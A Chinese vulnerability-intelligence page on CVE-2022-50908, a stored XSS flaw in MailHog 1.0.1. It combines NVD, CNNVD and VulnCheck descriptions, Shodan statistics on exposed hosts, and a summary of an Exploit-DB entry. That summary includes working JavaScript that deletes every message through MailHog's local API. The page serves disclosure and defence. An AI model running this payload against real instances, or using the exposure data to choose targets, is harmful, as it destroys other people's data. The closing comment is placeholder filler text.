一、 漏洞 CVE-2022-50908 基础信息
漏洞信息
# Mailhog 1.0.1 存储型XSS漏洞
N/A
神龙判断
是否为 Web 类漏洞: 未知
判断理由:
N/A
提示
尽管我们采用了先进的大模型技术,但其输出仍可能包含不准确或过时的信息。
神龙会尽力确保数据准确,但也请结合实际情况进行甄别与判断。
神龙祝您一切顺利!
神龙会尽力确保数据准确,但也请结合实际情况进行甄别与判断。
神龙祝您一切顺利!
漏洞标题
Mailhog 1.0.1 - Stored Cross-Site Scripting (XSS)
来源:美国国家漏洞数据库 NVD
漏洞描述信息
Mailhog 1.0.1 contains a stored cross-site scripting vulnerability that allows attackers to inject malicious scripts through email attachments. Attackers can send crafted emails with XSS payloads to execute arbitrary API calls, including message deletion and browser manipulation.
来源:美国国家漏洞数据库 NVD
CVSS信息
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
来源:美国国家漏洞数据库 NVD
漏洞类别
在Web页面生成时对输入的转义处理不恰当(跨站脚本)
来源:美国国家漏洞数据库 NVD
漏洞标题
Mailhog 跨站脚本漏洞
来源:中国国家信息安全漏洞库 CNNVD
漏洞描述信息
MailHog是MailHog开源的一个SMTP协议测试工具。 Mailhog 1.0.1版本存在跨站脚本漏洞,该漏洞源于存储型跨站脚本,可能导致攻击者通过电子邮件附件注入恶意脚本并执行任意API调用。
来源:中国国家信息安全漏洞库 CNNVD
CVSS信息
N/A
来源:中国国家信息安全漏洞库 CNNVD
漏洞类别
跨站脚本
来源:中国国家信息安全漏洞库 CNNVD
二、漏洞 CVE-2022-50908 的公开POC
| # | POC 描述 | 源链接 | 神龙链接 |
|---|
三、漏洞 CVE-2022-50908 的情报信息
标题: Mailhog 1.0.1 - Stored Cross-Site Scripting (XSS) - Multiple webapps Exploit -- 🔗来源链接
标签:exploit
神龙速读:从这个网页截图中可以获取到以下关于漏洞的关键信息: ### 漏洞信息 - **EID-ID**: 50971 - **CVE**: N/A - **Author**: Vulnz - **Type**: WEBAPPS - **Platform**: MULTIPLE - **Date**: 2022-06-27 - **Exploit**: - Download Link: [Download](#) - Raw Exploit: [Raw](#) - **Vulnerable App**: MailHog 1.0.1 ### Exploit Details ```markdown - **Exploit Title**: Mailhog 1.0.1 - Stored Cross-Site Scripting (XSS) - **Google Dork**: https://www.shodan.io/search?query=mailhog (> 3500) - **Date**: 06.18.2022 - **Exploit Author**: Vulnz - **Vendor Homepage**: https://github.com/mailhog/MailHog - **Software Link**: https://github.com/mailhog/MailHog - **Version**: 1.0.1 - **Tested on**: Windows, Linux, Docker - **CVE**: N/A ### Explanation Malicious users have the ability to send API requests to localhost and this request will be executed without any additional checks. As long as CSRF exists and unrestricted API calls as well, XSS could lead any API calls including email deletion, sending, reading or any other call. ``` ### Exploit Code ```javascript var XMLHttpFactories = [ function () { return new XMLHttpRequest() }, function () { return new ActiveXObject("Msxml2.XMLHTTP") }, function () { return new ActiveXObject("Msxml3.XMLHTTP") }, function () { return new ActiveXObject("Microsoft.XMLHTTP") } ]; function createXMLHTTPObject() { var xmlhttp = false; for (var i = 0; i < XMLHttpFactories.length; i++) { try { xmlhttp = XMLHttpFactories[i](); } catch (e) { continue; } break; } return xmlhttp; } var xhr = createXMLHTTPObject(); xhr.open("DELETE", "http://localhost:8025/api/v1/messages", true); xhr.onreadystatechange = function() { if (xhr.readyState == 4) { alert("Request completed, with the following status code: " + xhr.status); } } xhr.send(""); ``` ### Additional Notes - The exploit has not been verified by the EDB (Exploit Database). - The vulnerability is related to a Stored Cross-Site Scripting (XSS) attack in MailHog 1.0.1. - The exploit can potentially lead to unauthorized API calls, including email deletion, sending, reading, or any other call.
标题: GitHub - mailhog/MailHog: Web and API based SMTP testing -- 🔗来源链接
标签:product
神龙速读:### 关键漏洞信息 This screenshot does not directly indicate any specific vulnerabilities. However, some key security considerations based on the information provided: - **SMTP Server Configuration**: The application acts as an SMTP server. Misconfiguration could lead to unauthorized access or relaying. - **HTTP Server**: The HTTP server runs on port 8025. Ensure it is not exposed to the public internet without proper authentication. - **In-Memory Storage**: Messages are stored in memory by default. This could lead to data loss in case of crashes. Consider using persistent storage options. - **API Access**: The application has an HTTP API. Ensure proper authentication and authorization are in place. - **Chaos Monkey**: Includes a feature for failure testing. Use with caution in production environments.
标题: mailhog - Shodan Search -- 🔗来源链接
标签:product
神龙速读:### 漏洞关键信息 #### 总结果 - **总数**: 3,408 #### 漏洞摘要 - **主要产品**: MailHog - **漏洞信息**: - **示例漏洞信息**: `522 mailhog.example ESMTPL MailHog\r\n` #### 地理分布 - **主要国家** - Germany (947) - United States (515) - France (364) - Russian Federation (229) - Netherlands (194) #### 端口分布 - **主要端口** - 1025 (2,995) - 25 (87) - 1026 (76) - 443 (30) - 1027 (27) #### 组织分布 - **主要组织** - Hetzner Online GmbH (635) - DigitalOcean, LLC (486) - OVH SAS (228) - Google LLC (160) - Contabo GmbH (142) #### 技术堆栈 - **主要产品** - nginx (24) - Docker Registry HTTP API (21) - Apache httpd (9) - Prometheus Node Exporter (1) - **操作系统** - Ubuntu (10) - Ubuntu 22.04.4 LTS (Jammy Jellyfish) (Linux 5.15.0-112-generic) (1) ``` 这些信息概述了使用MailHog的系统分布、漏洞的端口暴露情况以及相关的技术栈和操作系统信息,它们可以帮助安全研究人员或系统管理员了解漏洞的影响范围和相关的技术上下文。
标题: Mailhog 1.0.1 - Stored Cross-Site Scripting (XSS) | Advisories | VulnCheck -- 🔗来源链接
标签:third-party-advisory
神龙速读:## 关键信息 - **漏洞名称:** Mailhog 1.0.1 - Stored Cross-Site Scripting (XSS) - **严重性:** MEDIUM - **日期:** January 13, 2026 - **影响版本:** Mailhog 1.0.1 - **CVE ID:** CVE-2022-50908 - **CVE类型:** CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') - **CVSS评分:** 5.4 (CVSSv3 Score: 5.4/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N) - **参考资料:** - [NVD](https://nvd.nist.gov/vuln/detail/CVE-2022-50908) - [ExploitDB](https://www.exploit-db.com/exploits/50971) - [MailHog GitHub Repository](https://github.com/mailhog/MailHog) - [Shodan Search Results for MailHog](https://www.shodan.io/search?query=MailHog) - **发现者:** Vulnz - **描述:** Mailhog 1.0.1 存在一个存储型跨站脚本漏洞,允许攻击者通过电子邮件附件注入恶意脚本。攻击者可以发送带有XSS有效载荷的定制电子邮件来执行任意API调用,包括消息删除和浏览器操作。
- https://nvd.nist.gov/vuln/detail/CVE-2022-50908
四、漏洞 CVE-2022-50908 的评论
匿名用户
2026-01-15 06:08:47Zaproxy alias impedit expedita quisquam pariatur exercitationem. Nemo rerum eveniet dolores rem quia dignissimos.